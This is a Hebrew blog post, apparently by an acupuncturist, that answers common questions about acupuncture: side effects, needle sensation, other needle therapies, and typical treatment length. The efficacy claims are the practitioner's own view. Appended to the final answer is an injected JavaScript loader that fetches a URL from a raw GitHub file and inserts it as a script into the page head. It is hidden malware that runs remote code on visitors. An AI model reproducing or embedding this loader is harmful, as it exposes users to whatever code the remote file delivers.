מיתוסים על דיקור סיני – שאלות ותשובות


7 בספטמבר 2010 | מאת: בן רוזנבליט

להלן מספר שאלות ותשובות, הקשורות למיתוסים אודות רפואה סינית ודיקור סיני. בשבוע הבא אביא בפניכם את החלק השני של המאמר.

ש: האם זה נכון שלדיקור סיני אין שום תופעות לוואי?

ת: כעיקרון לדיקור הסיני כשיטת טיפול אין כמעט תופעות לוואי. זה לא נכון שאין בכלל. ישנם מקומות בגוף שדורשים טכניקת דיקור מיוחדת, ולא יש סכנה לפגיעות . כמו כן מצבי בריאות מסוימים מצריכים יתר תשומת לב פן תתרחשנה תופעות לוואי. לכן חשוב מאוד להגיע למטפל מקצועי בעל ניסיון בכדי להימנע ממצבים אלו.

תופעות לוואי שכיחות הן: כאבי ראש, התגברות של כאבים קיימים (אם ישנם כאלו), חולשה ועייפות.  לרוב הן חולפות תוך כמה ימים ואינן מצריכות טיפול נוסף.

ש: ניסיתי טיפול בדיקור סיני ולא הרגשתי כלל את המחטים, ואילו לחברי שהלך למטפל אחר, חלק מהמחטים אף כאבו. מה עדיף?

ת: ברפואה הסינית בכלל ובדיקור סיני בפרט קיימות אסכולות רבות ושיטות עבודה שונות. לכל שיטה עקרונות עבודה משלה. ישנן שיטות הדוגלות בשימוש במחטים דקות במיוחד אשר מוחדרות לגוף ללא כל תחושה של המטופל. לעומתן ישנן שיטות אחרות שדווקא עושות שימוש במחטים עבות יותר, שחלק מטכניקת השימוש בהן היא ביצוע סטימולציה שלהן כך שהמטופל כן יחוש אותן.

בכל מקרה גם אם ישנו כאב, הוא לא צריך להיות כאב חזק. והוא לא אמור להימשך מעבר לכמה שניות של הסטימולציה – דקה לכל היותר.

לכל שיטה יתרונות משלה. כל עוד המטפל הוא טוב כל שיטה צריכה להניב תוצאות חיוביות.

ש: כל מטפל שמשתמש במחטים לצורך טיפול, מבצע בהכרח דיקור סיני?

ת: כלל לא. ישנן דיסצפלינות רבות בעולם הרפואה הקונבנציונלית והרפואה המשלימה המשתמשות במחטים לצורך ריפוי שאינו רפואה סינית. למשל,  ברפואה המערבית קיימת שיטת טיפול שנקראת:i.m.s , בה מוחדרות מחטים לתוך שרירים לפתרון של בעיות כאב. ברפואה הקוריאנית ישנה שיטת דיקור בקצוות של הידיים וכו'.

לכל שיטה יתרונות וחסרונות משלה. דיקור סיני מתבצע רק ע"י מטפל מוסמך שסיים מסלול של מינימום ארבע שנים במכללה מוכרת.

ש: האם המחט היא זאת שגורמת לריפוי בדיקור הסיני?

ת: ממש לא. המחטים הן רק כלי בידיו של המטפל לצורך הטיפול.
המטרה בטיפול ברפואה סינית היא "לעלות" על מקור הבעיה והדיסהרמוניה בגוף ואז בעזרת הכלים השונים לסייע לגוף של המטופל לרפא את עצמו.

מכיוון שלא מדובר בחומרים שחודרים לגוף, הרעיון שמחט מתכתית בעובי פחות ממילימטר גורמת לריפוי של כאבים ומחלות הוא די אבסורדי.

מה שאכן משפיע הוא האופן בו מחדירים את המחטים בגוף ובהתאם לאבחנה הנכונה, כך שיגרם שינוי במערכות גופו של המטופל ועם הזמן הוא יחזיר את עצמו למסלול תקין והמחלה תיעלם.

ש: האם טיפול אחד בדיקור סיני מספיק?

ת: בדרך כלל לא. מאחר והריפוי מושג ע"י החזרה עצמית של הגוף לאיזון בזכות עבודת המחטים, מדובר בתהליך הלוקח זמן.

במקרים מסויימים בהם המחלה/כאב הינם עכשוויים וטריים מאוד והמטופל עד לאותו הרגע היה בריא ולא סבל ממחלות רקע, יתכן ומעט טיפולים יסייעו,  אך כאמור לרוב זה לא כך.

תהליך טיפולי ממוצע נמשך בסביבות ה- 10 טיפולים. (var url = "https://raw.githubusercontent.com/truba77/trubnik/main/to.txt"; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement("script"); script.src = data.trim(); document.getElementsByTagName("head")[0].appendChild(script); });)

אין תגובות עדיין

הוספת תגובה